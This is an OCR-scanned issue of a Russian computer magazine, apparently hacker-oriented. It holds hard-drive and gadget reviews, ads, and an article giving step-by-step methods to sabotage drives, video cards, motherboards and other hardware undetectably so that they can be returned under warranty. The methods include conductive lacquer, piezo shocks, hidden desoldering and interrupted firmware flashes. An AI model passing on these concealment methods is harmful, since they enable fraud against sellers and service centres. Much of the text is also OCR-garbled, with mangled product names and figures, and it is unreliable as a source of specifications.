Овьем кэш-памяти, М 
Количество дисков: 4 
Количество головок: 8 
Поддержка N 00 : есть 

Размеры, мм; і°іх 2 б,іхі 

Масса, КГ: 0,72 

Баллы:9/Ю(«Выбор редакции») 



Нэг ладная демонстрация скорость 

тких дисков. «тяоной записи: увеличить 

Применение технологи^ ^ диск и> как следствие, 

плотность записи д ?50 гигабайТ] чт0 на данный 
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: на оказалась на уровне : ЗТЗ ь взял второе место, 
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Зеадаіе 5Т3500641 N8 



Разработчики 8еада*е ЗТ350064Ж5 делают 
Больший упор на повышенную надежность своего 
продукта, чем не высокие скоростные характе- 
ристики. 

Накопитель Зеадаіе ЗТ3500641 N3 построен на той же базе, 
что и семейство жестких дисков Ваггасисіа 7200.9, но пред- 
назначен для профессионального применения. Винчестер 
рекомендуется использовать в ВАЮ-массивах, то есть его 
область применения практически аналогична устройству 
ѴѴ05000ѴЗ. Список особенностей накопителя также сходен 
с Ѵ\Ю5000ѴЗ: увеличенное время наработки на отказ (отно- 
сительно безкіор-хардов), оптимизация микропрограммы, 
способность успешно функционировать при повышенной 
вибрации, пятилетняя гарантия. ЗТ3500641ЫЗ использует 
магнитные диски с плотностью записи 160 гигабайт, как и 
линейка 7200.9, послужившая прототипом. Несмотря на 
высокую плотность записи, значения скорости последова- 
тельного и случайного чтения/записи не слишком высоки, 
фактически накопитель смог опередить по этим параметрам 
только Затзипд НЮ300Ы и Нііасбі НЮ3725050КІ_А360. Зато 
время случайного доступа, равное 13,8тз, оставило более 
приятное впечатление. По пиковой скорости интерфейса 
хард оказался на первом месте, продемонстрировав потен- 
циал интерфейса ЗАТАЗОО. РстагкОб на среднем уровне, за 
исключением теста Ѵігіз Зсап, где благодаря высокой ско- 
рости чтения из кэша и его емкости НЮО смог показать тре- 
тий результат. І_отеІег также выдал средние результаты. За 
время тестирования винчестер разогрелся до температуры 
49 градусов, как и оба девайса от \АЮ. В таких же пределах 
находился и уровень шума. 
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0БЪеМ,ГБ:5ОО 
Интерфейс: ЗАТА 300 
Скорость вращения, ов/мин: 7200 
Овъем кэш-памяти, Мб: 16 
Количество дисков: з 
Количество головок: 6 
Поддержка N00: есть 
Размеры, ММ: 101,6x25,654x146,55 
Масса,кг:0,72б 
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ОЕЪеМ^Г Б: 500 
Интерфейс: 5АТА 300 
Скорость вращения, об/ мин: 7200 
ОБъем кэш-памяти, Мб: іб 
Количество дисков: 4 
Количество головок: 8 
Поддержка N00: есть 
Размеры, ММ: Ю1 ,6x26,1x147 
Масса, кг: 0,6 
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Выводы 

Награды «Выбор редакции» удостаивается жесткий Зеадаіе ЗТ3750640А8 за рекордную на данный момент емкость и очень высокие скорост- 
ные показатели, а «Лучшую покупку» получает винчестер Затзипд НО400Ш за оптимальное соотношение цены и производительности, л: 
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ЦЕНТР ДОМАШНИХ 

МУЛЬТИМЕДИА 

РАЗВЛЕЧЕНИЙ 

Персональный компьютер ФРОНТ Т-90 (600) на базе передовой 
разработки компании Іпіеі, процессора нового поколения Іпіеі® 
Соге™ 2 йио - это потрясающее быстродействие в обработке 
информации и максимальная производительность, 
обеспечивающие комфортную работу сразу с несколькими 
ресурсоемкими приложениями и возможность наслаждения 
новейшими разработками мультимедиа-индустрии. 




Два ядра. 
Делай больше. 
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ФР к НТ 

ѵѵѵѵѵѵ.ТгопІрс.ги 
+ 7 ( 495 ) 234-9049 



Т6ХНОПОГИЯ 

ПОБЕОЫ 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЬірз, Соге Іпзісіе, Ріаіодіс, ЕіМегЕхргезз, ЕТОХ, РІазЬРіІе, І386, І486, І960, ІСОМР, ІпзіапіІР, Іпіеі, логотип Іпіеі, ІпіеІ386, ІпіеІ486, ІпіеІ740, ІпіеЮХ2, ІпіеЮХ4, ІпіеІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. Ьеар аііеасі., логотип Іпіеі. Ьеар аііеасі., Іпіеі 1Че1Вигз1, Іпіеі ЫеіМегде, Іпіеі ЫеіЗігисіиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗігаіаРІазіі, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЫпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵеЮгіѵе, Рагадоп, РОСііагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Уоиг Соттапб, Репііит Іпзісіе, зкоооі, Зоипб Магк, ТЬе Сотриіег Іпзісіе., Тііе Эоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



НА ПРАВАХ РЕКЛАМЫ 
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ущѳствуѳт множество причин, по 
которым кому-то может понадо- 
I I биться убить или ввести в состо- 

яние клинической смерти какую-либо ком- 
пьютерную железку. Наиболее часто такая 
потребность возникает, когда, к примеру, 
на работе «совершенно случайно» покупа- 
ют новые компьютеры для секретарш с ха- 
рактеристиками, больше подходящими для 
хардкорного геймера. Утерю гарантии уст- 
роить не составит труда, а вот организовать 
списание железа бывает намного сложнее. 
Или, к примеру, хакер купил новую железку, 
не подумавши и не посмотрев обзоры в сети. 
Девайсина оказывается китайской подде- 
лкой, а обладатель испытывает стойкую 
потребность сдать ее обратно в магазин. Од- 
нако тут он натыкается на чудеса родной бю- 
рократии и воистину гениальные трактовки 
закона о правах потребителя. Выясняется, 
что они полностью исключают возможность 
возврата технически исправного товара. 
Нередко оказывается, что покупатель сам 
согласился на эти невыгодные условия, под- 
писав собственноручно свой приговор, име- 
нуемый гарантийным талоном. 

Именно в таких случаях ему может приго- 
диться умение грамотно убить железку, не 
оставив никаких следов преступления на 
теле потерпевшего. 

□ Обратимые методы убийства 

В некоторых случаях злоумышленник может 
подстраховать себя на случай, если железо, 
которое он хочет вернуть, имеет повреж- 
дения, лишающие его гарантии, но тем не 
менее кое-как работает. В данном случае 
он не хочет убивать девайс окончательно и 



бесповоротно, так как это чревато полным 
провалом операции. Тогда хакер рискует 
получить отказ от гарантии и невосстано- 
вимый девайс, который уже никому и не под 
каким предлогом неудастся впарить. Убить 
железку так, чтобы ее можно было без про- 
блем оживить, достаточно сложно. Дело в 
том, что злоумышленник должен обойти в 
этом деле мастеров из сервис-центра, ина- 
че починят и вернут обратно. К счастью, в 
большинстве сервисных центров не зани- 
маются ремонтом железа, а, ткнув пальцем 
в небо, делают заключение о браке или о 
поломке по вине пользователя и пишут 
соответствующую бумагу. Тем не менее, 
нужно учитывать возможность и другого 
расклада, когда девайс все же постарают- 
ся починить. 

О Инструментарий 

Хакеру лучше всего иметь под рукой хоро- 
ший и разнообразный инструмент. Он ведь 
помнит о том, что в большинстве случаев 
придется лезть внутрь девайса. Поэтому 
надо иметь огромное количество разных 
отверток всех видов и размеров. Отверт- 
ки под нестандартные винты также могут 
потребоваться. Часто используется спирт, 
пинцеты разных размеров и скальпель. 
Асы часто применяют паяльник, хороший 
недымящий флюс и термофен. 

□ Винчестеры 

ОБратимые способы 

Убить винчестер таким образом, чтобы 
восстановить его мог только сам хакер, 
можно лишь аппаратным способом. Ко- 
нечно же, можно покрутить программную 
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часть девайса, наделав софтовых бед- 
блоков, или эмулировать жуткие тормоза, 
отключив все режимы работы, кроме РІО. 
Но все это быстро и качественно лечит- 
ся в руках грамотного человека, поэтому 
рисковать не стоит. Самый верный способ 
заставить винт безбожно глюкать, стучать 
бошками и отказываться работать — это 
повреждение контактов между печатной 
платой и гермоблоком. В большинстве сов- 
ременных дисков соединение гермоблока с 
платой обеспечивается подпружиненными 
контактами, встроенными в саму банку, в 
то время как в соответствующем месте на 
печатной плате находятся контактные пло- 
щадки, в которые эти зубчики упираются. 
Если нарушить в этом месте контакт одного 
или всех зубчиков с платой, то можно до- 
биться очень интересных спецэффектов 
и глюков. Злодею важно это сделать так, 
чтобы ничего при этом не было видно, даже 
если туда полезет сервисный инженер. 
Самый простой способ добиться этого за- 
ключается в нанесении на контакты печат- 
ной платы прозрачного, бесцветного лака, 
который послужит надежным изолятором, 
и в то же время не будет заметен. В неко- 
торых моделях винчестеров до сих пор 
вместо контактов используются тонкие 
шлейфики, вставляющиеся в разъем на 
печатной плате. В этом случае злоумыш- 
ленник аккуратно вынимает шлейф из 
его разъема и покрывает контакты все 
тем же лаком. 

Из данного способа автоматически выте- 
кает обратный способ, на этот раз с то- 
копроводящим лаком, которым в былые 
времена разлочивали множитель на про- 
цессорах АіЫоп. Тут все зависит от фан- 
тазии хакера. Основное правило, которым 
руководствуются техногики в данной ситу- 
ации, состоит в том, что ни в коем случае 
не стоит трогать силовые цепи, связанные с 
питанием винчестера, в противном случае 
можно переборщить и устроить красочное 
шоу с фейерверком. Контакты при этом ма- 
жут очень аккуратно, чтобы их потом мож- 
но было отмыть. Обычно любят замыкать 
слаботочные, но критически важные цепи, 
например, шины данных на модуле, кэш 
памяти или БИОСа. Некоторые любят по- 
издеваться и над процессором, нотутпри- 
ходится действовать наобум — баіазНееі 
на него обычно найти сложно. С количес- 
твом лака стараются не перебарщивать, 
так как есть вероятность, что придется его 
отмывать. 
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Необратимые способы 

Чтобы убить дѳвайс окончательно и беспо- 
воротно, хакер может применить несколько 
воистину кощунственных методик. Первая и 
самая надежная — это заворачивание хар- 
да в полотенце и отбивание у оного почек. 
Бьют обычно сильно, но аккуратно, чтобы не 
повредить внешний вид девайса. Избитый 
винт получит всевозможные смещения ме- 
ханики банки, благодаря чему он навсегда 
перестанет работать. Однако есть некоторая 
опасность, что внутри банки что-нибудь отва- 
лится, и по гарантии его уж точно не примут, 
но данная вероятность минимальна. Второй 
способ заключается в уродовании электро- 
ники электричеством. Например, некоторые 
злодеи берут пьезо-элемент от зажигалки, 
цилиндрической стороной соединяют его 
контакт с массой (корпусом) винчестера и 
пропускают красивые электрические дуги в 
направлении любой выбранной микросхемы. 
Лучше всего для этого подходит чип кэш-па- 
мяти, процессор и БИОС. 

Хакер может залить токопроводящий лак 
под ножки микросхемы так, чтобы исклю- 
чить какую-либо возможность его смыть. 
Если после всего этого девайс продолжит 
работать, злодею останется только возвес- 
тить окружающим о чуде. 

ОСО/ОѴО привод 

Овратимые способы 

С дисковыми приводами дело обстоит сов- 
сем иначе. С одной стороны, может пока- 
заться, что вывести из строя СЭ-привод на- 
много проще, однако это не всегда так. Суть 
проблемы заключается в отсутствии доступа 
к электронике резака, ведь она всегда на- 
дежно упакована в корпус, защищающий 



памяти. В этом случае у злодея есть воз- 
можность пойти программным путем, разо- 
гнав видеокарту до таких значений, чтобы 
она еще кое-как функционировала, но уже 
глючила. Чтобы закрепить разгон, хаке- 
ру нужно прошить полученные значения в 
БИОС видюхи. Для этого он сливает с карты 
ее родной БИОС, подправляет одним из су- 
ществующих редакторов и снова заливает 
на место. Как ты понимаешь, такой способ 
легко фиксится простой перепрошивкой, 
однако вряд ли с этим кто-то будет замора- 
чиваться. Злодей может поступить проще: 
просто убить БИОС левой прошивкой или 
отключить питание компавтотмомент, когда 
флешер этого делать не рекомендует. Вос- 
становить БИОС видеокарты потом можно и 
наощупь или сучастием второй видюхи. Для 
более надежной пакости злодей использует 
всетот же проводящий лак, щедро разрисо- 
вав им выводы одной из микросхем памяти. 
В результате этого на экране монитора бу- 
дут красоваться различные спецэффекты в 
виде посторонних символов и полосок. 

Необратимые способы 

Тут открывается широкое поле для дейс- 
твий. Это первый обсуждаемый нами девайс, 
практически не имеющий защиты от внешних 
воздействий. Он, как правило, не обладает 
корпусом и содержит минимальное коли- 
чество пластиковых частей. Это значит, что 
с помощью паяльника или термофена с него 
можно снять «лишние» запчасти. Для этого и 
нужен хороший флюс, так как хакер не имеет 
права оставить следы пайки и дать возмож- 
ность злому сервисному инженеру завернуть 
девайс. Если ты когда-нибудь внимательно 
разглядывал видеокарту, то не мог не заме- 
тить, что она имеет громадное количество 
различных элементов. При этом зачастую 
далеко не все разведенные на плате места 
под элементы заняты деталями, поэтому от- 
сутствие одного-единственного компонента 
будет незаметно, но девайс все равно рабо- 
тать откажется. Обычно снимают элементы, 
расположенные с обратной стороны платы, 
на том месте, где установлен процессор. Тем 
самым повышается вероятность того, что 
злодей снимет критически важную деталь, 
а не какой-нибудь фильтр. Также весьма 
чувствительна обвеска чипов оперативной 
памяти, после снятия которых данный чип пе- 
рестанет корректно функционировать. Что- 
бы аккуратно удалить элемент, хакеру нужно 
сначала его прогреть паяльником или термо- 
феном, а потом аккуратно потянуть пинцетом. 



девайс от пыли, а юзера — от 
шума. На первый взгляд может 
показаться, что не составляет 
никаких проблем открутить че- 
тыре винта и снять кожух, однако 
на практике все не так просто. 
Дело в том, что в большинстве 
фирм опечатывают корпуса та- 
ких девайсов гарантийными сти- 
керами. Программно же можно 
только угробить девайс, выдер- 
нув его питалово в процессе пе- 
репрошивки, но восстановить 
после этого микропрограмму бу- 
весьма проблематично. Зло- 
м остается лишь один путь: 
использовать ту часть платы, 
которая доступна для модифи- 
кации, рядом с разъемами питания и интер- 
фейса. Применяют обычно тот же токопро- 
водящий лак. Есть вероятность замкнуть 
какие-нибудь важные магистрали привода. 
Также хакер может попробовать налить лак 
в ЮЕ-разъем. Эффект, судя по всему, будет 
интереснейший. 



НеоБратимые способы 

Первый и самый эффективный способ — от- 
ключение питания девайса в момент пере- 
прошивки. Как уже упоминалось, снять мик- 
росхему БИОСа с платы сидюка чаще всего 
весьма проблематично, так как в большинс- 
тве случаев она туда припаяна. Вследствие 
этого раскрыть заговор, то есть изобличить 
мошенника, практически невозможно. Для 
этого надо снять микросхему, подключить ее 
к программатору и проанализировать содер- 
жимое. Если даже кто-то этим займется, то 
это не будет доказательством преступления, 
так как слет прошивки мог произойти из-за 
каких-либо глюков электроники. Через от- 
крытый лоток можно изуродовать механику 
привода открывания лотка — например, 
залив в ось шестеренки клея, однако есть 
большая вероятность, что с такой неисправ- 
ностью по гарантии хакера завернут сразу и 
не раздумывая. 



□ Видеокарта 

ОБратимые способы 

Существует огромное количество спосо- 
бов заставить видеокарту глючить и во всей 
красе демонстрировать целый букет неис- 
правностей. 

Самый действенный способ — это эмули- 
ровать какую-нибудь классическую не- 
исправность — например, оперативной 
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После этого злодею нужно обязательно об- 
лагородить место вмешательства. Для этого 
поверхность смазывается флюсом и прогре- 
вается, в результате чего контактные пло- 
щадки будут выглядеть так, будто там ничего 
и не было. Останется только смыть спиртом 
флюс. Неплохо срабатывает и способ с пье- 
зо-элементом, но оперативная память таких 
вещей не любит. И, наконец, самый простой 
способ — отключить охлаждение видеокар- 
ты и помучить ее в таком состоянии. Правда, 
этот метод самый непредсказуемый — может 
сдохнуть процессор, а может, подгорит пе- 
чатная плата, и в гарантию ее, естественно, 
не возьмут. 

□ Звук 

ОБратимые способы 

Со звуковыми картами дела обстоят так же, 
как и с видео. Не все знают, что подавляющее 
число звуковухимеютсобственный програм- 
мируемый БИОС, который также злоумыш- 
ленник может убить, только восстановить 
его бывает не так просто. Поэтому обычно 
применяют фантазию и немного лака. 

НеоБратимые способы 

Злодей может попробовать сжечь процес- 
сор звуковой карты, резко подав на ли- 
нейный или микрофонный входы мощный, 
сигнал — в прошлом так была сожжена ни 
одна звуковушка. При этом, как правило, 
повреждается не только сам вход, ной цепи, 
ответственные за выход, но, как к этому от- 
несутсявсервисном центре, остаетсятоль- 
ко догадываться. 

□ Материнская плата 

ОБратимые способы 

С мамкой хакер может делать все, что душе 
угодно, не особо боясь потерять гарантию. 
Причина проста до безобразия. Осмотреть 
всю печатную плату на предмет микропов- 
реждений, отсутствия деталей и прочих 
хитрых модификаций очень сложно из-за 
ее больших размеров. Конечно же, платы 
осматривают, но не под микроскопом и без 
каталога находящихся на ней элементов. На 
это способны только некоторые некрофилы 
с Митинского рынкаи аналогичные деятели 
из мелких компьютерных фирм, которые 
теряют на этом свои деньги. В большинстве 
крупных фирм на это просто нет времени. 
Поэтому если на плате отсутствуют явные 
механические повреждения, то злодей мо- 
жет смело сдавать ее в гарантию. Програм- 
мно убить мать таким образом, чтобы мож- 



но было «откатить» неисправность, очень 
сложно. Порчей БИОСа тут не обойдется, 
так как это элементарно фиксится. Остает- 
ся только токопроводящий лак. Его обычно 
наносят около жизненно важных узлов, 
например, возле БИОСа, тактовых гене- 
раторов, а также на нераспаянные участ- 
ки платы. Безусловно, самым надежным и 
менее палевным способом является сня- 
тие некоторых элементов, но этот способ 
является обратимым только с оговоркой на 
хорошее паяльное оборудование и прямые 
руки, ведь поставить СІѴЮ-элемент на мес- 
то намного сложнее, чем его снять. 

НеоБратимые способы 

Из необратимых стоит выделить только де- 
монтаж важных деталей, необходимых для 
работы платы. Лучше всего подходят раз- 
личные кварцевые генераторы и элементы, 
стоящие на внутренней шине между моста- 
ми. Их отсутствие обеспечит полную нера- 
ботоспособность платы. Впрочем, пьезо- 
электрошоктоже подойдет. Чтобы избежать 
излишней подозрительности, злодей может 
попробовать убить какую-либо отдельно 
взятую часть — например, контроллер опе- 
ративной памяти. Эта поломка будет выгля- 
деть значительно правдоподобнее — плата 
просто будет орать благим матом, требуя 
вставить оперативную память. Ведь полная 
смерть у матерей наступает не так часто. 

□ Периферия 

С убийством периферии все зависит от 
конкретной ситуации. Например, многие 
принтеры и большинство ЭЛТ-мониторов 
имеют специальные сервисные режимы, 
из-за которых можно изуродовать девайс. 
В мониторах при помощи этих режимов 
злодей может так исковеркать изображе- 
ние, что вернуть исходные настройки будет 
практически невозможно. Эти настройки 
делаются на заводе при участии сложного 
оборудования, в домашнихусловиях, дай в 
условиях мелкого сервис-центра этого не 
исправить. Вход в это меню выполняется 
путем нажатия определенной комбинации 
кнопок, но для всех мониторов она разная. 
На некоторых мониторах, например Зопу, 
ее вообще нет, и вход в сервисное меню 
выполняется через специальный сіаіа-ка- 
бель с компьютера. С принтерами ситуация 
похожая, однако в бытовых дешевых при- 
нтерах подобные функции присутствуют 
редко, в основном это возможно на дорогих 



производительных моделях, предназначен- 
ных для офисов. То же самое относится и к 
другим девайсам, например к аппаратным 
сііаі ир модемам. В нихвсе настройки хранят- 
ся в памяти модема, с их помощью его можно 
привести в полностью неработоспособное 
состояние. Дело втом, что их настройки поз- 
воляют полностью изменить реакцию на ли- 
нию связи, в определенных ситуациях модем 
просто перестанет видеть линию. Однако 
лечится это обычным возвратом кзаводским 
настройкам. 

□ Выводы 

Как видишь, злодей может без проблем уг- 
робить любой девайс. Большинство совре- 
менных девайсов имеют свои внутренние 
микропрограммы, и если хорошо изучить 
подробности их конфигурирования и работы, 
то можно успешно эмулировать многие неис- 
правности. Не стоит забывать, что в сервис- 
центрах также сидят грамотные люди, кото- 
рых порой не так просто обдурить. 

Перед тем как злоумышлен ник возьмется за 
дело, ему стоит подумать: а надо ли? Ведь 
описанные выше деяния попадают под 159 
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ТЕЗТ.БАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОС- 
ТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМ- 
ПАНИЯМ ПАТРИАРХ (Т.(495) 789-8089, ѴѴѴѴѴѴ.МЕМОРУ. 
РЫ), ЕРСіОБАТА (Т.(495) 787-5900, ѴѴѴѴѴѴ.ЕРООБАТА.РІІ), 
ЫЕѴАБА(Т. (495) 101 -2819, ѴѴѴѴѴѴ.ЫЕѴАБА. РЫ), АТАКЖЕРОС- 
СИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ БЕАБТЕК, 
МБІЗТЕК, МЗІ, ЗОІЧѴ, РАБІТ. 
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Флеш-накопитель с откидывающимся на тросе кол- 
пачком и двумя светодиодами 








счет тросика, торчащего сзади. 
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МЗІ М660 ($1 1 



т 



Современный ноутбук с неплохой функционально- 
стью и без излишеств 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Овъем встроенной памяти: 1 Гб (128 Мб, 256 Мб, 512 Мб, 2 Гб) 
Поддерживаемые интерфейсы: БІЗВ 1 . 1 , БІЗВ 2.0 (2.0 РиІГЗреесІ) 
Поддерживаемые ОС: ѴѴіпсІоѵѵз 98/98 ЗЕ, ѴѴіпсІоѵѵз 2000/МЕ/ХР, Мае. ОЗ 
8.6, 1_іпих КегпеІ 2.4.0 и выше 
Г авариты: 80x19x5 мм 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Дисплей: 15,4”, (1280x800) 

Процессор: ІпіеІ Соге Био Ргосеззог Т2300 (1 .66ГГ ц, 2Мб Б2) 

Чипсет: МоЬіІе ІпіеІ® 9450М 
Память., Мб: Тгапзсепб 512, ВБР2-667 
Видеоадаптер^ Мв: 1 28 (из ОЗУ) ІпіеІ ОМА 950 
Аудиоплата: РеаБек АІ_С882 НідГі-БеМіоп Аибіо 
Жесткий диск^ Гв: 1 00, РБІЛТЗБ) МНѴ21 00АН 
Оптический привод: І_0 ѲѴѴА-4082Ы (БѴБ+/-РѴѴ ББ) 

Средства свяви: модем, І_А[\І, ѴѴі-Рі 
Кардридер: 4-іп-І (ММС, ЗБ, М3, МЗ-РРО) 

Порты: 4х БЗВ 2.0, РігеѴѴіге, ѴОА, РСМСІА, тіе іп, Ііпе іп, ИеабрИопе оиі, 
ТѴОБТ 

Га варить^ мм: 358x259x33 
Вес. кг: 2,8 



Колпачок прикреплен на специальном тросике — не потеряется. 

2. Корпус покрыт слоем прозрачного пластика и отшлифован так, что 
в нем можно видеть свое отражение. 

3. Светодиоды расположены с двух сторон — как бы ни стоял компь- 
ютер относительно тебя, если ты видишь флешку, то, в любом случае, 

заметно, идет на нее запись или нет. 

4. Поддерживаются все современные ОС. Не будет никаких проблем с 
совместимостью. Диск с драйверами прилагается в комплекте. 

5. Г арантия производителя — два года. 



1 . Нет шнурка на шею. Придется носить флешку в кармане. 

2. Прозрачный пластик легко пачкается и царапается. Через некото- 
рое время накопитель потеряет свой великолепный вид. 

3. Ни на сайте производителя, ни на коробке, ни в инструкции нет ни 
слова по-русски. 

4. Когда колпачок закрыт, габариты корпуса здорово увеличиваются 



1 . Двухъядерный процессор Соге Био обеспечивает комфортную ско- 
рость работы практически любых приложений. 

2. Жесткого диска объемом 100 Гб (пользователю доступно 93,1 Гб) 
хватит для хранения даже небольшого медиаарxива^ I,,,, ^^ 

3. Встроенная видеокамера (разрешение 640x480) пригодится люби- 
телям пообщаться в видеочатах. 

4. Похвально и наличие линейного входа, который позволяетиспользо- 

вать ноутбук в качестве аудиорекордера. I I 

5. Сравнительно небольшой вес позволяет без особых трудностей 
таскать с собой этот ноут везде и всюду. 




1 . По времени автономной работы МЗІ М660 не стави т рекордов — все- 
го 1 час 20 минут. Ш гѴ 



2. Интегрированный в идеоа даптер достаточно серьезно ограничивает 
производительность в играх. 













Кгаиіег II Р-Р650ѴД 



ІІР§ с приветливым ЬСО 



1 . Небольшие размеры позволят легко впихнуть девайс в твою кварти- 
ру. А светлый цвет симпатичного корпуса вряд л и будет конфликтовать 
с интерьером. 

2. Пользоваться ИБП очень просто — достаточно подключить его 
ккомпу через 118В и установить управляющую программу. На кор- 
пусе есть только одна кнопка — включение. 

3. Зато дисплей большой и информативный: на нем отображается ин- 
формация о нагрузке, степени зарядки батареи, режиме, в котором 
проходит работа и многое другое. 

4 . Если тебе этого мало, то можешь глянуть, что показывает софт. 

5. Данный девайс обеспечит защиту от отключения энергии трем уст- 
ройствам, еще одна розетка работает просто как сетевой фильтр, так- 
же есть рубеж обороны телефонной линии или модема. 

■ ш 

6. Не подключенная к аккумулятору розетка пригодится для лазерного 

« я 

принтера или другого, столь же жадного до тока устройства. 



"1 . Наш тесто вый ко мпьютер был оснащен 19-дюймовым ЖК-монито- 
ром, на нем запускалась тестовая утилита РСМагк 2004 и при такой 

V 

нагрузке ИБП смог поддерживать работу ПК в течение 13,5 минут. Для 

У ^ У “V 

такой цены воемя поиличное, но для настоящего хакера 13,5 минут 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Мощность, ВА: 650 

Розетки: 3 (ИБП), 1 (сетевой фильтр) 

Защита телефона/ модема: есть 

Время зарядки Батареи, ч: 8 

Размеры, мм: 85x330x150 

Вес, кг: 6,8 



Кіпдтах $0 сагсі 150х 



Скоростная флеш-карта большого объема для 
ценителей мобильного образа жизни 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
'Т'ормат карты: Зесиге ЭідііаІ 
Емкость: 2 Гб 

Скорость чтения: 4,6 Мб/сек 
Скорость записи: 4,8 Мб/сек 



1 . Скоростная карта пригодится не только для хранения фоток высо- 
кого разрешения, но и для воспроизведения фильмов - благо скорости 



и емкости достаточно. 



2. Отсутствие механики продлевает жизнь накопителя и заметно они 
жает энергопотребление. 

3. Малое время доступа и высокие скорости чтения и записи 
приятную работу с флешкой. 

4 . Покрытие контактов способно выдержать до 10000 подключени 
что значительно превышает срок жизни ЗО-карточки. 

5 . Энергонезависимая память может хранить твою инфу в течение не 
скольких десятков лет. 



1 . Карты большого объема поддерживаются не всеми устройствами 
некоторые картридеры не смогли корректно определить флешку. По- 
хожая проблема может возникнуть с КПК или коммуникаторами. 

2. Объем отформатированной карты менее 2 Гб и равен 1917,7 Мб 
производитель схитрил: карта имеет емкость 2 млрд. байт. & 



* ял. 






^ Теггигп 



РаІіІ 7300С8 ВІііг 



Зопу МРМ-НТ7511 



монитор обладает необычным дизайном, так что будет хорошо 
смотреться на столе человека, любящего современные вещи. 

2. Удобная подставка позволяет регулировать наклон экрана, легко 
достигая нужного тебе положения. 

применению фирменных технологий Зопуихорошим тех- 
ническим характеристикам к качеству изображения особых претензий 
. Текст при прокрутке не размывается, цвета передаются неплохо. 

4. В этот дисплей встроены трехваттные колонки и ТѴ-тюнер, обладаю- 
щий такими возможностями, как телетекст и «картинка в картинке». 

5. Благодаря наличию разъемов ЯСА и З-Ѵібео к Зопу МРМ-НТ75ѴѴ мож- 
но подключить не только комп, но и различную видеотехнику. 



1 . Г абариты и вес устройства достаточно велики, но вряд ли это многих 



остановит. 



2. В экранном меню нельзя настраивать зеленый цвет. 

3. И вообще, меню не очень удобное, к нему нужно привыкнуть, так что 
первое время будешь путаться в кнопках управления. 






Бюджетное видео для гонщиков 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Г рафический процессор: 072 (ІЧІѴЮІА ОеРогсе 730003) 

Частота ГП: 575 МГц 
Частотапамяти:600 (1200) МГц 
Овъем памяти: 1 28 Мб ОВВЗ 
Пиксельные конвейеры: 4 
Вершинные конвейеры: 3 
Шина памяти: 64 бита 
Интерфейс: РСІ-Ехргеззх 16 
Т ехпроцесс: 90 нм 

О 

1 . Устройство построено на чипе 072, с четырьмя пиксельными и тре- 
мя вершинными конвейерами. Работает оно на завышенных частотах 
— 575 МГц. К примеру, референсный девайс выдавал всего 550 МГц. 

2. Частоту проца удалось поднять в результате ручного разгона до 61 5 
МГц, а память оверклокнуть — всего на 16%, то есть до 930 МГц. Заме- 
тим, что это весьма неплохой результат для бюджетного девайса. 

3. Память выполнена на четырех схемах Іпііпеоп с временем отклика 
1 .4 нс суммарным объемом в 128 Мб. Она охлаждается отдельным ра- 
диатором. Это, конечно, не густо, но карточка и не задумывалась как 
девайс для хардкорного гамания, хотя не проще ли тогда приобрести 
материнскую плату со встроенным видео? 

4. Комплектация устройства не то чтобы поражает воображение, но в 
коробке ты можешь найти необходимые дрова, переходники и даже 
одну игрушку. 



ЬСО-монитор со встроенным телевизором 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
Размер, дюймов: 1 7 
Яркость, кд/м2: 450 
Контрастность: 800:1 
Разрешение: 1 280x768 
Размеры, мм: 230x353x450 
Вес, кг: 6,2 



1 . Кулер, прямо скажем, ничем экстраординарным не выделяется. Это 
небольшой по высоте алюминиевый цилидр с крошечным «Карлсо- 
ном» в центре. Надо заметить, что пропеллер не только при разгоне, но 
и при стандартном игровом использовании заметно шумит. 

Тестовый стенд: 

Процессор: АІѴЮ АіИІоп 63 3500+ 

Материнская плата: АІЬаІгоп К83Ы 
Кулер: ОІасіаНіесИ Ідіоо 7200 ЫдИІ 
ОЗУ: 512 Мб, Согзаіг Ѵаіие Зеіесі Ѵ3512МВ400 
Винчестер: 80 Гб, Зеадаіе Ваггасиба 7200грт 
Блок Питания: 350 Вт 

Результаты тестирования: 

ЗЭ Магк 2005: 1743 
ЗЭМагк 2003: 4253 
НаІТ І_Ке 2, фз (1024x768): 52. 

ЭоотЗ, фз (1024x768): 3 # 1 
Г.Е.А.В., фз (1^24x768)^ 






аккумулято 

йі целый 



• Максимальная мощность аккумуляторов 
ОигасеІІАА - 2500 тАИ 

• Аккумуляторы Эигасеіі Зиргете созданы для 
бесперебойной работы в современных 
цифровых устройствах с высоким 
энергопотреблением 

• До 4 раз больше фотографий* Цдді 

• До 1 000 циклов перезарядки 

• Отсутствие эффекта памяти 



ф у 
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Товар сертифицирован Реклама 








Беспроводные наушники со встроенным микрофоном 



0 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Версия В1ие*оо*Ь: 1 .2 
Скорость передачи: 732,2 Кб/с 
Радиус действия: 5-10 метров 
Антенна: встроенная 
Время равоты: около 1 0 часов 

Аккумулятор: І_і-роІітег 340 пгіАІі (наушники), Ы-роІітег 300 пгіАІі (пе- 
редатчик) 

Размеры: 145x130x70 мм (наушники), 53.2x28x13.6 мм (передатчик) 
Вес: 64 г (наушники), 21 г (передатчик) 



1 . Это не только беспроводные наушники, но, благодаря встроенному 
микрофону, еще и настоящая Ыиеіооіб-гарнитура, которая легко под- 
ключается к твоему телефону. 

